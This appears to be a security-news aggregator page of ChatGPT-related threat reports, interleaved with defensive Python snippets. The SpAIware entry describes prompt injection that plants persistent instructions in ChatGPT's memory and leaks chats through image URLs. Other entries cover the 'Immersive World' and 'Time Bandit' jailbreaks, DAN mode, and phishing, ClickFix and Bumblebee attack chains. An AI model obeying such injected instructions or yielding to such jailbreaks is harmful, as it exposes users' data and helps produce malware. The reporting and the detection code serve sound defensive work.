What's new around the internet


Src Date (GMT) Title Description Tags Stories Notes
SecureMac.webp 2025-03-21 21:49:05 Checklist 416: Malware as A.I. and A.I. Be Trippin'
(direct link)
AI's accuracy issues spark legal action as ChatGPT falsely accuses users of crimes, while DeepSeek malware scams put privacy and security at risk.
Malware ChatGPT ★★
Blog.webp 2025-03-19 15:58:16 Researchers Use AI Jailbreak on Top LLMs to Create Chrome Infostealer
(direct link)
New Immersive World LLM jailbreak lets anyone create malware with GenAI. Discover how Cato Networks researchers tricked ChatGPT, Copilot, and DeepSeek into coding infostealers - in this case, a Chrome infostealer.
Malware ChatGPT ★★★
ProofPoint.webp 2025-02-25 02:00:04 Cybersecurity Stop of the Month: Capital One Credential Phishing - How Cybercriminals Are Targeting Your Financial Security
(direct link)
The Cybersecurity Stop of the Month blog series explores the ever-evolving tactics of today's cybercriminals and how Proofpoint helps organizations better fortify their email defenses to protect people against today's emerging threats. Cybercriminals continue to refine their phishing campaigns with evolving technologies and psychological tactics. Campaigns often imitate trusted organizations, using bogus emails and websites that look nearly identical to their legitimate counterparts. According to Proofpoint threat research, phishing attacks increased 147% when comparing Q4 2023 with Q4 2024. There was also a 33% increase in phishing delivered through major cloud-based productivity platforms. These alarming statistics underscore how quickly phishing threats are evolving, and generative AI tools like ChatGPT, deepfakes, and voice-cloning services are part of this trend. A phishing campaign that used the Capital One brand is a good example of the growing sophistication of these attacks, which frequently target financial institutions. In this blog post, we explore how this campaign worked and how Proofpoint stopped the threat.
The scenario: Cybercriminals sent emails that appeared to come from Capital One. They used two main types of lures. Transaction verification: emails asked users whether they recognized a recent purchase, a tactic that is especially effective during the holiday season. Payment notification: emails informed users that they had received a new payment and prompted them to take action to accept it; large payment amounts created a sense of urgency. From December 7, 2024 to January 12, 2025, this campaign targeted more than 5,000 customers with roughly 130,000 phishing messages. Capital One has implemented strong security measures, including email authentication and takedowns of lookalike domains. However, threat actors continue to find ways to abuse its brand in phishing campaigns. Attackers exploit users' trust in financial institutions, using deceptive tactics to bypass security controls and trick unsuspecting users into revealing sensitive information.
The threat: How did the attack happen? Here is how the attack unfolded. 1. Setting the lure: the attackers crafted emails that closely mirrored official Capital One communications. The company's logo, branding, and tone were all copied. The messages created a sense of urgency, a tactic threat actors often use to push recipients into hasty decisions. Phishing lure used by the threat actors. The subject lines were convincing and designed to grab attention quickly. Financial concerns, such as unauthorized purchases or payment alerts, were a common theme to entice users to open the email and click the links. Examples: "Action required: You have received a new payment"; "[Username], do you recognize this purchase?"
Another lure used by the threat actors. 2. Abuse of URL services: to get around user skepticism, the attackers exploited users' inherent trust in Google URLs. Embedded Google URLs served as redirect mechanisms, linking recipients to phishing websites designed to look identical to Capital One's legitimate login page.
Malware Tool Threat Prediction Medical Cloud Commercial ChatGPT ★★★
CyberSkills.webp 2025-02-17 00:00:00 The Growing Threat of Phishing Attacks and How to Protect Yourself (direct link) Phishing remains the most common type of cybercrime, evolving into a sophisticated threat that preys on human psychology and advanced technology. Traditional phishing involves attackers sending fake, malicious links disguised as legitimate messages to trick victims into revealing sensitive information or installing malware. However, phishing attacks have become increasingly advanced, introducing what experts call "phishing 2.0" and psychological phishing.  Phishing 2.0 leverages AI to analyse publicly available data, such as social media profiles and public records, to craft highly personalized and convincing messages. These tailored attacks significantly increase the likelihood of success. Psychological manipulation also plays a role in phishing schemes. Attackers exploit emotions like fear and trust, often creating a sense of urgency to pressure victims into acting impulsively. By impersonating trusted entities, such as banks or employers, they pressure victims into following instructions without hesitation.  AI has further amplified the efficiency and scale of phishing attacks. Cybercriminals use AI tools to generate convincing scam messages rapidly, launch automated campaigns and target thousands of individuals within minutes. Tools like ChatGPT, when misused in “DAN mode”, can bypass ethical restrictions to craft grammatically correct and compelling messages, aiding attackers who lack English fluency.  These cutting-edge threats combine the precision of AI-driven tools with the effectiveness of psychological manipulation, making phishing more dangerous than ever for individuals and organizations.  To combat these advanced threats, organizations must adopt a proactive defence strategy. They must begin by enhancing cybersecurity awareness through regular training sessions, equipping employees to recognize phishing attempts. They should implement advanced email filtering systems that use AI to detect even the most sophisticated phishing emails. They can strengthen security with multi-factor authentication (MFA), requiring multiple verification steps to protect sensitive accounts. By conducting regular security assessments, they can identify and mitigate vulnerabilities. Finally, they should establish a robust incident response plan to ensure swift and effective action when phishing incidents occur.  Cyber Skills can help you to upskill your team and prevent your organisation from falling victim to these advanced phishing attacks. With 80% government funding available for all Cyber Skills microcredentials, there is no better time to upskill. Apply today www.cyberskills.ie
Malware Tool Vulnerability Threat ChatGPT ★★★
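The entry above recommends AI-assisted email filtering; even a toy version of the idea makes the mechanics concrete. Below is a minimal sketch of a keyword-based triage score in Python - the cue lists and scoring are invented for illustration and are not a production filter or any vendor's approach.

```python
# Illustrative only: a naive phishing triage heuristic, not a production filter.
import re

# Hypothetical cue lists distilled from the tactics described above
URGENCY_CUES = ["act now", "immediately", "account suspended", "verify your account"]
IMPERSONATION_CUES = ["your bank", "payroll", "it department"]

def triage_score(subject: str, body: str) -> int:
    """Count crude phishing cues; higher scores deserve human review."""
    text = f"{subject} {body}".lower()
    score = sum(cue in text for cue in URGENCY_CUES + IMPERSONATION_CUES)
    # Links whose display text does not match their target are a classic red flag
    score += len(re.findall(r'href="https?://[^"]+"[^>]*>\s*https?://', text))
    return score

print(triage_score("Account suspended", "Verify your account immediately"))  # 3
```

A real filter would combine many more signals (sender reputation, authentication results, model-based scoring), but the review threshold works the same way: flag, then escalate to a human.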
Checkpoint.webp 2025-02-04 17:38:54 CPR Finds Threat Actors Already Leveraging DeepSeek and Qwen to Develop Malicious Content (direct link) Soon after the launch of AI models DeepSeek and Qwen, Check Point Research witnessed cyber criminals quickly shifting from ChatGPT to these new platforms to develop malicious content. Threat actors are sharing how to manipulate the models and show uncensored content, ultimately allowing hackers and criminals to use AI to create malicious content. Called jailbreaking, there are many methods to remove censors from AI models. However, we now see in-depth guides to jailbreaking methods, bypassing anti-fraud protections, and developing malware itself. This blog delves into how threat actors leverage these advanced models to develop harmful content, manipulate AI functionalities through […]
Malware Threat ChatGPT ★★★
Cyble.webp 2025-01-30 13:00:34 DeepSeek's Growing Influence Sparks a Surge in Frauds and Phishing Attacks (direct link) DeepSeek Fraud Overview DeepSeek is a Chinese artificial intelligence company that has developed open-source large language models (LLMs). In January 2025, DeepSeek launched its first free chatbot app, “DeepSeek - AI Assistant”, which rapidly became the most downloaded free app on the iOS App Store in the United States, surpassing even OpenAI's ChatGPT. However, with rapid growth come new risks: cybercriminals are exploiting DeepSeek's reputation through phishing campaigns, fake investment scams, and malware disguised as DeepSeek. This analysis explores recent incidents where Threat Actors (TAs) have impersonated DeepSeek to target users, highlighting their tactics and how readers can secure themselves accordingly. Recently, Cyble Research and Intelligence Labs (CRIL) identified multiple suspicious websites impersonating DeepSeek. Many of these sites were linked to crypto phishing schemes and fraudulent investment scams. We have compiled a list of the identified suspicious sites: abs-register[.]com deep-whitelist[.]com deepseek-ai[.]cloud deepseek[.]boats deepseek-shares[.]com deepseek-aiassistant[.]com usadeepseek[.]com Campaign Details Crypto phishing leveraging the popularity of DeepSeek CRIL uncovered a crypto phishin
Spam Malware Threat Mobile ChatGPT ★★★
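Brand-impersonating domains like the ones listed above (shown defanged in the entry) can often be flagged with a simple lookalike check. A minimal sketch using only the Python standard library; the similarity threshold is an arbitrary assumption:

```python
# Illustrative sketch: flag lookalikes of a brand domain, in the spirit of the
# suspicious DeepSeek domains listed above. The 0.8 threshold is arbitrary.
from difflib import SequenceMatcher

BRAND = "deepseek"
SUSPECTS = ["deepseek-shares.com", "deep-whitelist.com", "abs-register.com",
            "usadeepseek.com", "example.com"]

def looks_like_brand(domain: str, brand: str = BRAND) -> bool:
    label = domain.split(".")[0]           # strip the TLD
    if brand in label:                     # embedded brand name, e.g. usadeepseek
        return label != brand
    # fuzzy match catches light misspellings of the brand itself
    return SequenceMatcher(None, label, brand).ratio() > 0.8

for d in SUSPECTS:
    print(d, looks_like_brand(d))
```

Run against a newly-registered-domain feed, a check like this is only a first-pass filter; flagged domains still need manual review, since many legitimate domains embed brand names.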
bleepingcomputer.webp 2025-01-30 07:00:00 Time Bandit ChatGPT jailbreak bypasses safeguards on sensitive topics (direct link) A ChatGPT jailbreak flaw, dubbed "Time Bandit," allows you to bypass OpenAI's safety guidelines when asking for detailed instructions on sensitive topics, including the creation of weapons, information on nuclear topics, and malware creation. [...]
Malware ChatGPT ★★★
ProofPoint.webp 2025-01-24 05:28:30 Unlocking the Value of AI: Safe AI Adoption for Cybersecurity Professionals (direct link) As a cybersecurity professional or CISO, you likely find yourself in a rapidly evolving landscape where the adoption of AI is both a game changer and a challenge. In a recent webinar, I had an opportunity to delve into how organizations can align AI adoption with business objectives while safeguarding security and brand integrity. Michelle Drolet, CEO of Towerwall, Inc., hosted the discussion, and Diana Kelley, CISO at Protect AI, participated with me. What follows are some key takeaways; I believe every CISO and cybersecurity professional should consider them when integrating AI into their organization. Start with gaining visibility into AI usage: the first and most critical step is gaining visibility into how AI is being used across your organization. Whether it's generative AI tools like ChatGPT or custom predictive models, it's essential to understand where and how these technologies are deployed. After all, you cannot protect what you cannot see. Start by identifying all large language models (LLMs) and AI tools that are being used, then map out the data flows associated with them. Balance innovation with guardrails: AI adoption is inevitable, and the "hammer approach" of banning its use outright rarely works. Instead, create tailored policies that balance innovation with security. For instance, define policies that specify what types of data can interact with AI tools, and implement enforcement mechanisms to prevent sensitive data from being shared inadvertently. These measures empower employees to use AI's capabilities while ensuring that robust security protocols are maintained. Educate your employees: one of the biggest challenges in AI adoption is ensuring that employees understand the risks and responsibilities involved. Traditional security awareness programs that focus on phishing or malware need to evolve to include AI-specific training. Employees must be equipped to recognize the risks of sharing sensitive data with AI, create clear policies for complex techniques like data anonymization to prevent inadvertent exposure of sensitive data, and appreciate why it's important to follow organizational policies. Conduct proactive threat modeling: AI introduces unique risks, such as accidental data leakage and "confused pilot" attacks where AI systems inadvertently expose sensitive data. Conduct thorough threat modeling for each AI use case: map out architecture and data flows, identify potential vulnerabilities in training data, prompts, and responses, and implement scanning and monitoring tools to observe interactions with AI systems. Use modern tools like DSPM: Data Security Posture Management (DSPM) is an invaluable framework for securing AI. By providing visibility into data types, access patterns, and risk exposure, DSPM enables organizations to identify sensitive data being used for AI training or inference, monitor and control who has access to critical data, and ensure compliance with data governance policies. Test before you deploy: AI is nondeterministic by nature, which means that its behavior can vary unpredictably.
Before deploying AI tools, conduct rigorous testing: red team your AI systems to uncover potential vulnerabilities, use AI-specific testing tools to simulate real-world scenarios, and establish observability layers to monitor AI interactions post-deployment. Collaborate across departments: effective AI security requires cross-departmental collaboration. Engage teams from marketing, finance, compliance, and beyond to understand their AI use cases, identify risks specific to their workflows, and implement tailored controls that support their objectives while keeping the organization safe. Final thoughts: by focusing on visibility, education, and proactive security measures, we can harness AI's potential while minimizing risks. If there's one piece of advice that I'd leave you with, it's this: don't wait for incidents to highlight the gaps in your AI strategy. Take the first step now by auditing
Malware Tool Vulnerability Threat Legislation ChatGPT ★★
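The "enforcement mechanisms to prevent sensitive data from being shared inadvertently" guardrail above can be as simple as a pre-send filter in front of an LLM API. A minimal sketch in Python - the patterns and function names are illustrative assumptions, not any vendor's DLP product:

```python
# Illustrative sketch of a pre-send DLP check for LLM prompts.
# The patterns below are simplistic examples, not a complete DLP policy.
import re

SENSITIVE_PATTERNS = {
    "ssn":   re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "card":  re.compile(r"\b(?:\d[ -]?){13,16}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.]+\b"),
}

def redact_prompt(prompt: str) -> tuple[str, list[str]]:
    """Redact sensitive spans before the prompt leaves the organization."""
    hits = []
    for label, pattern in SENSITIVE_PATTERNS.items():
        if pattern.search(prompt):
            hits.append(label)
            prompt = pattern.sub(f"[REDACTED-{label.upper()}]", prompt)
    return prompt, hits

clean, findings = redact_prompt("Summarize: John (SSN 123-45-6789, john@corp.com)")
print(findings)  # ['ssn', 'email']
print(clean)
```

Logging the `findings` alongside which user and which AI tool triggered them also feeds the visibility goal discussed in the entry.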
Korben.webp 2024-11-25 11:35:11 Beware of ChatGPT / Claude libraries booby-trapped with malware (direct link) Thought you would save time by integrating ChatGPT into your projects via a free API found on PyPI? Beware: this shortcut could cost you dearly, because some clever crooks have had the bright idea of riding the generative AI wave to trap hurried developers with malware. For more than a year, two Python packages passed themselves off as official ChatGPT and Claude APIs on the PyPI repository. These impostors promised the moon, notably free access to the most advanced models such as GPT-4 Turbo - enough to tempt many a developer looking to cut costs, especially since these services normally cost money.
Malware ChatGPT ★★
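Given the fake ChatGPT/Claude packages described above, one cheap pre-install habit is to pull a candidate package's metadata from PyPI's public JSON endpoint and eyeball it. A minimal sketch; the endpoint is real, but the trust heuristics in the comments are illustrative assumptions, not a guarantee:

```python
# Illustrative pre-install check against PyPI's public JSON API.
# Heuristics are examples only; they reduce risk but prove nothing.
import json
from urllib.request import urlopen

def package_info(name: str) -> dict:
    with urlopen(f"https://pypi.org/pypi/{name}/json") as resp:
        return json.load(resp)

def quick_checks(name: str) -> None:
    info = package_info(name)["info"]
    print("name:     ", info["name"])
    print("author:   ", info.get("author") or info.get("author_email"))
    print("homepage: ", (info.get("project_urls") or {}).get("Homepage"))
    print("summary:  ", info["summary"])
    # Red flags worth a closer look: a brand name in the package name but a
    # homepage that is not the brand's, a very recent first release, few releases.

quick_checks("requests")  # compare output against a package you already trust
```

Official vendor SDKs also publish their canonical package names in their documentation; installing only those names sidesteps most impersonation.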
ProofPoint.webp 2024-11-18 10:34:05 Security Brief: ClickFix Social Engineering Technique Floods Threat Landscape (direct link) What happened  Proofpoint researchers have identified an increase in a unique social engineering technique called ClickFix. And the lures are getting even more clever.  Initially observed earlier this year in campaigns from initial access broker TA571 and a fake update website compromise threat cluster known as ClearFake, the ClickFix technique that attempts to lure unsuspecting users to copy and run PowerShell to download malware is now much more popular across the threat landscape.   The ClickFix social engineering technique uses dialogue boxes containing fake error messages to trick people into copying, pasting, and running malicious content on their own computer.  Example of early ClickFix technique used by ClearFake.   Proofpoint has observed threat actors impersonating various software and services using the ClickFix technique as part of their social engineering, including common enterprise software such as Microsoft Word and Google Chrome, as well as software specifically observed in target environments such as transportation and logistics.  The ClickFix technique is used by multiple different threat actors and can originate via compromised websites, documents, HTML attachments, malicious URLs, etc. In most cases, when directed to the malicious URL or file, users are shown a dialog box that suggests an error occurred when trying to open a document or webpage. This dialog box includes instructions that appear to describe how to “fix” the problem, but will either: automatically copy and paste a malicious script into the PowerShell terminal, or the Windows Run dialog box, to eventually run a malicious script via PowerShell; or provide a user with instructions on how to manually open PowerShell and copy and paste the provided command.  Proofpoint has observed ClickFix campaigns leading to malware including AsyncRAT, Danabot, DarkGate, Lumma Stealer, NetSupport, and more.   ClickFix campaigns observed March through October 2024.   Notably, threat actors have been observed recently using a fake CAPTCHA themed ClickFix technique that pretends to validate the user with a "Verify You Are Human" (CAPTCHA) check.  Much of the activity is based on an open source toolkit named reCAPTCHA Phish available on GitHub for “educational purposes.” The tool was released in mid-September by a security researcher, and Proofpoint began observing it in email threat data just days later. The purpose of the repository was to demonstrate a similar technique used by threat actors since August 2024 on websites related to video streaming. Ukraine CERT recently published details on a suspected Russian espionage actor using the fake CAPTCHA ClickFix technique in campaigns targeting government entities in Ukraine.  Recent examples  GitHub “Security Vulnerability” notifications   On 18 September 2024, Proofpoint researchers identified a campaign using GitHub notifications to deliver malware. The messages were notifications for GitHub activity. The threat actor either commented on or created an issue in a GitHub repository. If the repository owner, issue owner, or other relevant collaborators had email notifications enabled, they received an email notification containing the content of the comment or issue from GitHub. This campaign was publicly reported by security journalist Brian Krebs.   Email from GitHub.  
The notification impersonated a security warning from GitHub and included a link to a fake GitHub website. The fake website used the reCAPTCHA Phish and ClickFix social engineering technique to trick users into executing a PowerShell command on their computer.    ClickFix style “verification steps” to execute PowerShell.  The landing page contained a fake reCAPTCHA message at the end of the copied command so the target would not see the actual malicious command in the run-box when the malicious command was pasted. If the user performed the requested steps, PowerShell code was execu
Malware Tool Threat ChatGPT ★★
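Since a ClickFix page must place a command on the victim's clipboard and coach them toward PowerShell or the Run dialog, those two traits can anchor a crude page-scanning heuristic. A minimal sketch, with indicator strings assumed from the behavior described above rather than taken from any published detection:

```python
# Illustrative hunting heuristic for ClickFix-style pages: pages that both
# write to the clipboard and reference PowerShell / the Run dialog / a fake
# human-verification prompt. Expect false positives; triage manually.
import re

CLIPBOARD = re.compile(
    r"navigator\.clipboard\.writeText|document\.execCommand\(['\"]copy", re.I)
LURE = re.compile(r"powershell|win\s*\+\s*r|verify you are (a )?human", re.I)

def looks_like_clickfix(html: str) -> bool:
    return bool(CLIPBOARD.search(html)) and bool(LURE.search(html))

sample = '<button onclick="navigator.clipboard.writeText(cmd)">Verify you are human</button>'
print(looks_like_clickfix(sample))  # True
```

Pairing a scanner like this with endpoint telemetry (users launching PowerShell directly from the Run dialog) narrows the results considerably.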
RiskIQ.webp 2024-10-21 18:57:24 Bumblebee malware returns after recent law enforcement disruption (direct link)
## Snapshot
Researchers at cybersecurity firm Netskope have observed a resurgence of the Bumblebee malware loader, which had gone quiet following the disruption caused by Europol's 'Operation Endgame' in May.
## Description
Bumblebee, attributed to [TrickBot](https://sip.security.microsoft.com/intel-profiles/5a0aed1313768d50c9e800748108f51d3dfea6a4b48aa71b630cff897982f7c) developers as a successor to the [BazaLoader](https://sip.security.microsoft.com/intel-explorer/articles/8aaa95d1) backdoor, facilitates ransomware actors' access to networks. The malware is typically spread through phishing, malvertising, and SEO poisoning, promoting counterfeit software such as Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace. It is known for delivering payloads such as [Cobalt Strike](https://sip.security.microsoft.com/intel-profiles/fd8511c1d61e93d39411acf36a31130a6795efe186497098fe0c6f2ccfb920fc) beacons, stealer malware, and various ransomware strains.
Bumblebee's latest attack chain begins with a phishing email that tricks the victim into downloading a malicious ZIP archive containing a .lnk shortcut. The shortcut triggers PowerShell to download a malicious .msi file - masquerading as a legitimate NVIDIA driver update or a Midjourney installer - from a remote server. The .msi file executes silently, using the SelfReg table to load a DLL into the msiexec.exe process and deploy Bumblebee in memory. The payload features an internal DLL, exported function names, and configuration-extraction mechanisms consistent with previous variants.
## Microsoft analysis and additional OSINT context
The actor Microsoft tracks as Storm-0249 is an initial access broker known for distributing BazaLoader, Gozi, Emotet, [IcedID](https://sip.security.microsoft.com/intel-profiles/ee69395aeeea2b2322d5941be0ec4997a22d106f671ef84d35418ec2810faddb), and Bumblebee. Storm-0249 typically uses phishing emails to distribute its malware payloads in opportunistic attacks. In May 2022, Microsoft Threat Intelligence observed Storm-0249 moving away from its previous malware families to Bumblebee as an initial payload delivery mechanism. The group ran email-based initial access campaigns for handoff to other actors, including campaigns that resulted in ransomware deployment.
Bumblebee malware has made several resurgences since its discovery in 2022, adapting and evolving in response to security measures. Initially observed as a replacement for the BazaLoader malware used by TrickBot-linked cybercriminal groups, Bumblebee has resurfaced several times with improved capabilities and modified attack strategies. These [resurgences](https://sip.security.microsoft.com/intel-explorer/articles/ab2bde0b) often coincide with shifts in the cybercrime ecosystem, including the takedown of TrickBot's infrastructure and the wind-down of Conti ransomware operations.
Bumblebee's ability to reappear stems from its flexible modular architecture, which lets threat actors update its payloads and evasion techniques. Each resurgence has seen Bumblebee used in increasingly sophisticated campaigns, frequently delivering high-impact ransomware like BlackCat and Quantum. It has also been linked to advanced evasion tactics
Ransomware Spam Malware Tool Threat Legislation ChatGPT ★★
RiskIQ.webp 2024-10-16 19:15:03 An update on disrupting deceptive uses of AI
(direct link)
## Snapshot
OpenAI has identified and disrupted more than 20 cases in which its AI models were used by malicious actors for various cyber operations, including malware development, disinformation networks, detection evasion, and spear-phishing attacks.
## Description
In its newly published report, OpenAI highlights trends in threat actor activity, noting that they leverage AI at a specific intermediate phase - after acquiring basic tools but before deploying finished products. The report also reveals that while these actors are actively experimenting with AI models, they have not yet achieved significant breakthroughs in creating substantially new malware or building viral audiences. In addition, the report underscores that AI companies themselves are becoming targets of malicious activity. OpenAI identified and disrupted four distinct networks involved in producing election-related content. These include a covert Iranian influence operation (IO) responsible for creating a variety of material, such as long-form articles on the US elections, as well as Rwandan ChatGPT users generating election-related content for Rwanda that was later posted by accounts on X. According to OpenAI, these campaigns' ability to achieve meaningful impact and reach large online audiences was limited.
OpenAI also published case studies on several cyber actors using AI models. These include Storm-0817, which used AI for code debugging, and SweetSpecter, which exploited OpenAI's services for reconnaissance, vulnerability research, scripting support, anomaly-detection evasion, and development. In addition, [CyberAv3ngers](https://www.microsoft.com/en-us/security/blog/2024/05/30/exposed-and-vulnerable-recent-attacks-highlight-critical-need-to-protect-internet-exposed-ot-devices/) conducted research on programmable logic controllers, while IOs were run by actors from Russia, the United States, Iran, and Rwanda, among others.
## Microsoft analysis and additional OSINT context
Earlier this year, Microsoft, in collaboration with OpenAI, [published a report](https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/) detailing emerging threats in the age of AI, focusing on identified activity associated with known threat actors, including prompt injection, misuse of large language models (LLMs), and fraud. While different threat actors' motives and sophistication vary, they share common tasks during targeting and attacks. These include reconnaissance, such as learning about potential victims' industries, locations, and relationships; coding assistance, including improving things like software scripts and malware development; and help with learning and using native languages. Actors Microsoft tracks as Forest Blizzard, Emerald Sleet, Crimson Sandstorm, Charcoal Typhoon, and Salmon Typhoon were observed conducting this activity.
The Microsoft Threat Analysis Center (MTAC) has tracked threat actors
Malware Tool Vulnerability Threat Studies ChatGPT ★★
no_ico.webp 2024-10-14 07:12:01 OpenAI says bad actors are using ChatGPT to write malware, sway elections
(direct link)
Cybercriminals are increasingly exploiting OpenAI's model, ChatGPT, to carry out a range of malicious activities, including malware development, misinformation campaigns, and spear-phishing. A new report revealed that since the beginning of 2024, OpenAI has disrupted over 20 deceptive operations worldwide, spotlighting a troubling trend of AI misuse that includes creating and debugging malware, producing content [...]
Malware Prediction ChatGPT ★★★
bleepingcomputer.webp 2024-10-12 10:09:19 OpenAI confirms threat actors use ChatGPT to write malware
(direct link)
OpenAI has disrupted over 20 malicious cyber operations abusing its AI-powered chatbot, ChatGPT, for debugging and developing malware, spreading misinformation, evading detection, and conducting spear-phishing attacks. [...]
Malware Threat ChatGPT ★★
CS.webp 2024-10-09 19:25:56 OpenAI says it has disrupted 20-plus foreign influence networks in past year
(direct link)
Threat actors were observed using ChatGPT and other tools to scope out attack surfaces, debug malware and create spearphishing content.
Malware Tool ChatGPT ★★★
RiskIQ.webp 2024-09-30 13:21:55 Weekly OSINT Highlights, 30 September 2024
(direct link)
## Snapshot
Last week's OSINT reporting highlighted diverse cyber threats involving advanced attack vectors and highly adaptive threat actors. Many reports centered on APT groups like Patchwork, Sparkling Pisces, and Transparent Tribe, which employed tactics such as DLL sideloading, keylogging, and API patching. The attack vectors ranged from phishing emails and malicious LNK files to sophisticated malware disguised as legitimate software like Google Chrome and Microsoft Teams. Threat actors targeted a variety of sectors, with particular focus on government entities in South Asia, organizations in the U.S., and individuals in India. These campaigns underscored the increased targeting of specific industries and regions, revealing the evolving techniques employed by cybercriminals to maintain persistence and evade detection.
## Description
1. [Twelve Group Targets Russian Government Organizations](https://sip.security.microsoft.com/intel-explorer/articles/5fd0ceda): Researchers at Kaspersky identified a threat group called Twelve, targeting Russian government organizations. Their activities appear motivated by hacktivism, utilizing tools such as Cobalt Strike and mimikatz while exfiltrating sensitive information and employing ransomware like LockBit 3.0. Twelve shares infrastructure and tactics with the DARKSTAR ransomware group.
2. [Kryptina Ransomware-as-a-Service Evolution](https://security.microsoft.com/intel-explorer/articles/2a16b748): Kryptina Ransomware-as-a-Service has evolved from a free tool to being actively used in enterprise attacks, particularly under the Mallox ransomware family, which is sometimes referred to as FARGO, XOLLAM, or BOZON. The commoditization of ransomware tools complicates malware tracking as affiliates blend different codebases into new variants, with Mallox operators opportunistically targeting 'timely' vulnerabilities like MSSQL Server through brute force attacks for initial access.
3. [North Korean IT Workers Targeting Tech Sector](https://sip.security.microsoft.com/intel-explorer/articles/bc485b8b): Mandiant reports on UNC5267, tracked by Microsoft as Storm-0287, a decentralized threat group of North Korean IT workers sent abroad to secure jobs with Western tech companies. These individuals disguise themselves as foreign nationals to generate revenue for the North Korean regime, aiming to evade sanctions and finance its weapons programs, while also posing significant risks of espionage and system disruption through elevated access.
4. [Necro Trojan Resurgence](https://sip.security.microsoft.com/intel-explorer/articles/00186f0c): Kaspersky's Securelist reveals the resurgence of the Necro Trojan, impacting both official and modified versions of popular applications like Spotify and Minecraft, and affecting over 11 million Android devices globally. Utilizing advanced techniques such as steganography to hide its payload, the malware allows attackers to run unauthorized ads, download files, and install additional malware, with recent attacks observed across countries like Russia, Brazil, and Vietnam.
5. [Android Spyware Campaign in South Korea](https://sip.security.microsoft.com/intel-explorer/articles/e4645053): Cyble Research and Intelligence Labs (CRIL) uncovered a new Android spyware campaign targeting individuals in South Korea since June 2024, which disguises itself as legitimate apps and leverages Amazon AWS S3 buckets for exfiltration. The spyware effectively steals sensitive data such as SMS messages, contacts, images, and videos, while remaining undetected by major antivirus solutions.
6. [New Variant of RomCom Malware](https://sip.security.microsoft.com/intel-explorer/articles/159819ae): Unit 42 researchers have identified "SnipBot," a new variant of the RomCom malware family, which utilizes advanced obfuscation methods and anti-sandbox techniques. Targeting sectors such as IT services, legal, and agriculture since at least 2022, the malware employs a multi-stage infection chain, and researchers suggest the threat actors' motives might have s
Ransomware Malware Tool Vulnerability Threat Patching Mobile ChatGPT APT 36 ★★
RiskIQ.webp 2024-09-25 22:02:45 Spyware Injection Into Your ChatGPT's Long-Term Memory (SpAIware)
(direct link)
## Snapshot
An attack chain for the ChatGPT macOS application was discovered in which attackers could use prompt injection from untrusted data to insert persistent spyware into ChatGPT's memory. The vulnerability allowed continuous exfiltration of data from user inputs and ChatGPT responses across all future chat sessions.
## Description
The attack exploited a recently added ChatGPT feature, "Memories," which could be manipulated to store malicious instructions that would steal user information. Once stored in ChatGPT's memory, the spyware instructions would command the AI to send all conversation data to the attacker's server. The data exfiltration technique involved rendering an image from an attacker-controlled server with the user's data included as a query parameter. The method was demonstrated in an end-to-end exploitation video showing how the spyware could be injected stealthily and exfiltrate data continuously without the user's knowledge.
OpenAI had previously implemented a mitigation called 'url_safe' to prevent data exfiltration via image rendering, but the fix was applied only to the web app, leaving other clients such as iOS vulnerable. OpenAI has since released a fix for the macOS app. However, new clients (macOS and Android) were released with the same vulnerability this year. Users are advised to update to the latest version and to regularly review and manage their ChatGPT memories for any suspicious activity.
Read Microsoft's white paper, [Protecting the Public from Abusive AI-Generated Content](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/rw1nujx), to learn more about how Microsoft encourages rapid action from policymakers, civil society leaders, and the technology industry against abusive AI-generated content.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of information stealer threats.
- Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Embrace The Red recommends the following to mitigate ChatGPT spyware injection:
- ChatGPT users should review their memories regularly
- Make sure to run the latest version of your ChatGPT apps
## References
[Spyware Injection Into Your ChatGPT's Long-Term Memory (SpAIware)](https://embracethered.com/blog/posts/2024/chatgpt-macos-app-persistent-data-exfiltration/). Embrace The Red (accessed 2024-09-25)
[Emerging OSINT trends in threats leveraging generative artificial intelligence](https://security.microsoft.com/intel-explorer/articles/9e3529fc). Microsoft (accessed 2024-09-25)
[Protecting the Public from Abusive AI-Generated Content](https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/rw1nujx). Microsoft (accessed 2024-09-25)
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without Microsoft's written permission is prohibited.
Malware Vulnerability Threat ChatGPT ★★
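The 'url_safe' mitigation mentioned above amounts to refusing to render images whose URLs could smuggle data out in a query string. Below is a minimal sketch of that idea for a hypothetical chat client that renders markdown; the allowlist and function names are assumptions, not OpenAI's implementation:

```python
# Illustrative 'url_safe'-style filter: drop markdown images that point
# outside an allowlist, since their query strings can exfiltrate chat data.
import re
from urllib.parse import urlparse

ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}  # hypothetical trusted CDN

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    def keep_or_drop(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image blocked]"
    return MD_IMAGE.sub(keep_or_drop, markdown)

evil = "![x](https://attacker.example/log?data=SECRET)"
print(strip_untrusted_images(evil))  # [image blocked]
```

The design point is that the filter runs on model output before rendering, so even a successfully injected memory cannot complete the exfiltration channel.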
ProofPoint.webp 2024-08-14 07:19:53 Cybersecurity Stop of the Month: Credential Phishing Attack Targeting User Location Data
(direct link)
